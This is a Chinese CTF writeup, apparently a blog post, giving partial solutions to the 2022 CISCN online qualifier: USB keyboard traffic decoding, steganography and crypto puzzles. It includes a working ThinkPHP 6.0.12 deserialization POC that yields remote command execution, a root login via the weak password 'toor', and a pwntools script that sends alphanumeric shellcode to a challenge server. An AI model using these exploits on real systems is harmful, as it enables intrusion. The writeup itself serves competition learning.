- 1subprocess.run方法
- 2GPUImage 原理_didoutputsamplebuffer gpuimage
- 3HarmonyOS 生态最重的拼图,手机开发者 Beta 版终于到来_harmonyos 1+8+n
- 4模糊边界的语义/实例分割问题_实例分割要求边界清楚
- 5Unity游戏开发:背包系统的实现_unity背包系统
- 6归并排序理解与实例_归并排序生活中例子
- 7Angualr +Ionic监听回车键输入文本实现搜索_ionic input 回车执行
- 8让生活更加精致的APP?
- 9oracle 每3位加逗号,[DB][Oracle]Oracle格式化数字的方法(指定小数点位数,每3位加逗号)...
- 102022 年值得尝试的 7 个 MQTT 客户端工具_mqtt客户端
第15届全国大学生知识竞赛场景实操 2022ciscn线上初赛 部分writeup_usb流量hid data提权
赞
踩
ez_usb
拿到附件wireshark打开 观察
发现流量中存在两种键盘流量
过滤
usb.addr == “2.8.1” && usbhid.data跟usb.addr == “2.10.1” && usbhid.data
分别导出为csv文件
提取hid data
梭哈脚本,将流量包中有关USB HID的数据提取出来并转成十六进制,然后对比官方的USB HID表进行转码
USB HID Usage Tables 1.12(P52).pdf (book118.com)
DicData = {0x04: "A", 0x05: "B", 0x06: "C", 0x07: "D", 0x08: "E", 0x09: "F", 0x0A: "G", 0x0B: "H", 0x0C: "I", 0x0D: "J", 0x0E: "K", 0x0F: "L", 0x10: "M", 0x11: "N", 0x12: "O", 0x13: "P", 0x14: "Q", 0x15: "R", 0x16: "S", 0x17: "T", 0x18: "U", 0x19: "V", 0x1A: "W", 0x1B: "X", 0x1C: "Y", 0x1D: "Z", 0x1E: "1", 0x1F: "2", 0x20: "3", 0x21: "4", 0x22: "5", 0x23: "6", 0x24: "7", 0x25: "8", 0x26: "9", 0x27: "0", 0x28: "\n", 0x2A: "[DEL]", 0x2B: " ", 0x2C: " ", 0x2D: "-", 0x2E: "=", 0x2F: "[", 0x30: "]", 0x31: "\\", 0x32: "~", 0x33: ";", 0x34: "'", 0x36: ",", 0x37: ".", 0x38: "/", 0x57:"+", 0x58: "\n", 0x59: "1", 0x5A: "2", 0x5B: "3", 0x5C: "4", 0x5D: "5", 0x5E: "6", 0x5F: "7", 0x60: "8", 0x61: "9" } ListNumber = [] datas = open("2.txt") for data in datas: if int('0x' + data[4:6], 16) < 0x04 or int('0x' + data[4:6], 16) > 0xa0: continue ListNumber.append(int(data[4:6], 16)) datas.close() print(ListNumber) flag = "" sign = 0 for number in ListNumber: if sign == 0: if number == 0x39: sign = 1 continue else: flag += DicData[number].lower() else: if number == 0x39: sign = 0 continue else: flag += DicData[number].upper() print(flag)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
得到
观察526177为rar文件hex开头,导入010editor中保存为rar文件,另一串为压缩包密码,解压得到flag
everlasting_night
拿到附件,stegsolve打开,观察a2通道有lsb隐写痕迹
使用工具梭哈:cloacked-pixel 秘钥为f78dcd383f1b574b
得到加密的压缩包
同时图片尾有一串多余的md5 fb3efce4ceac2f5445c7ae17e3e969ab
将此字符串为压缩包密码打开压缩包
使用010editor删除文件头后保存附件为flag.data,使用gimp打开修正宽高比为352:287 得到flag
问卷调查
填写问卷得到flag
签到电台
密码本内容
取前七个4位数字分别与弼时安全到达了的电码进行模10运算得到6449093660734572841578386746,通过burpsuite抓包发送两次得到flag
Ezpop
1、打开靶机,发现TP版本为V6.0.12
2、根据题目提示,百度搜索TP6.0.12的漏洞
3、找到一篇关于该版本TP反序列漏洞的文章
4、文章里面有现成的poc可以直接利用,接下来找到路由即可
5、访问/www.zip,下载题目的源码
6、全局搜索unserialize,在index.php下的index类中的test方法找到路由
7、利用poc生成payload,在/index.php/index/test/下POST提交,成功RCE
8、修改命令,最终在根目录下找到flag
POC如下:
<?php namespace think\model\concern; trait Attribute { private $data = ["key" => ["key1" => "cat /flag.txt"]]; private $withAttr = ["key"=>["key1"=>"system"]]; protected $json = ["key"]; } namespace think; abstract class Model { use model\concern\Attribute; private $lazySave; protected $withEvent; private $exists; private $force; protected $table; protected $jsonAssoc; function __construct($obj = '') { $this->lazySave = true; $this->withEvent = false; $this->exists = true; $this->force = true; $this->table = $obj; $this->jsonAssoc = true; } } namespace think\model; use think\Model; class Pivot extends Model { } $a = new Pivot(); $b = new Pivot($a); echo urlencode(serialize($b));
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
基于挑战码的双向认证1、2
1、题目描述是ssh端口,直接ssh登录上去,发现cube-challenge文件
2、进去后没发现什么有用的东西
3、凭借web手的本能,利用正则寻找flag:find /| grep flag
4、在/root/cube-shell/instance/flag_server/发现flag1.txt和flag2.txt
5、尝试访问,发现flag没有设置访问权限,两个flag到手
基于挑战码的双向认证3
1、同样ssh连接,故技重施一波
2、找到flag位置,尝试访问,提示没有权限访问
3、查看当前linux版本,发现是Red Hat 4.8.5
4、尝试利用弱口令进行root提权,发现密码为toor,直接拿到flag
Iso9798
连接后通过sha256密码碰撞得到前四位输入进行交互
import hashlib
dic = 'abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for a in dic:
for b in dic:
for c in dic:
for d in dic:
t =str(a)+str(b)+str(c)+str(d)+'VsPPBo6CqCXA6om2'
m = (hashlib.sha256(t.encode())).hexdigest()
if m[:64] == '6c744733df904ddf1b75ac9cd690c117c3feec780f518ae6abbef054c1678f25':
print(t)
break
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
随机输入数字得到回显的加密密文
将密文分成三组,交换前两组位置后进行提交得到flag
Login-nomal
通过上述几处位置可知冒号前为指令,冒号后为参数,指令与指令之间通过“\n”划分,指令只有opt和msg,通过opt可进入函数,参数要为ro0t
分析可以发现再进入该函数即可执行shellcode,并且shellcode要可见
from pwn import *
io = remote("123.56.87.204",31166)
context.log_level = "debug"
io.recv()
shellcode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
# gdb.attach(io)
# pause()
payload = "opt:1\n" + "msg:ro0t1\n"
io.sendline(payload)
payload = "opt:2\n" + "msg:" + shellcode + "\n"
io.sendline(payload)
io.interactive()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
通过pwntools生成shellcode,并利用alpha3生成可见字符将shellcode填入exp中,交互得到flag
Baby-tree
浏览baby-tree.ast文件可发现以下几处可疑的地方
分析发现为AST语法树的内容,构造exp得到flag
keyValue = '345y' values = [88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16] k = [ord(i) for i in keyValue] # [51, 52, 53, 121] # print(k) for i in range(0, len(values)-4+1): k[0], k[1], k[2], k[3] = k[1], k[2], k[3], k[0] for i in range(len(values)-4, -1, -1): k[1], k[2], k[3], k[0] = k[0], k[1], k[2], k[3] r1 = values[i+3] ^ k[3] r0 = values[i+2] ^ k[2] r3 = values[i+1] ^ ((k[1] + (r1 >> 2)) & 0xff) r2 = values[i+0] ^ ((k[0] + (r0 >> 4)) & 0xff) values[i], values[i+1], values[i+2], values[i+3] = r0, r1, r2, r3 flag = '' for c in values: flag += chr(c) print(flag)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 1
